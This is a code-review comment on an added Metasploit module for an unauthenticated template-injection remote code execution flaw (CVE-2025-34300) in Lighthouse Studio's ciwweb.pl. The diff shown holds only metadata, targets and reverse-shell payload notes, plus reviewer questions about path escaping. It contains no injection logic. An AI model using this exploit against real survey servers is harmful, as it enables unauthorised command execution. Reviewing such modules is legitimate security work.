modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb

```diff
@@ -0,0 +1,144 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => "Template Injection Vulnerability in Sawtooth Software's Lighthouse Studio (CVE-2025-34300)",
+        'Description' => %q{
+          This module exploits a template injection vulnerability in the
+          Sawtooth Software Lighthouse Studio's `ciwweb.pl` web application.
+          The application fails to properly sanitize user input within survey templates,
+          allowing unauthenticated attackers to inject and execute arbitrary Perl commands
+          on the target system.
+
+          This vulnerability affects Lighthouse Studio versions prior to 9.16.14.
+          Successful exploitation may result in remote code execution under the privileges
+          of the web server, potentially exposing sensitive data or disrupting survey operations.
+
+          An attacker can execute arbitrary system commands in the context of the user running the web server.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Maksim Rogov', # Metasploit Module
+          'Adam Kues' # Vulnerability Discovery
+        ],
+        'References' => [
+          ['CVE', '2025-34300'],
+          ['URL', 'https://slcyber.io/assetnote-security-research-center/rce-in-the-most-popular-survey-software-youve-never-heard-of/']
+        ],
+        'Platform' => ['multi'],
+        'Arch' => [ARCH_CMD],
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd
+              # Tested with cmd/unix/reverse_bash
+              # Tested with cmd/linux/http/x64/meterpreter/reverse_tcp
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => ['windows'],
+              'Arch' => ARCH_CMD,
+              'Type' => :win_cmd,
+              'DefaultOptions' => {
+                'FETCH_WRITABLE_DIR' => 'C:\\\\Windows\\\\Tasks\\\\'
```

Comment:
Few points here:
- Is `\` a bad char, and needs to be escaped?
- Can we use a relative path to not rely on the `C:\` drive?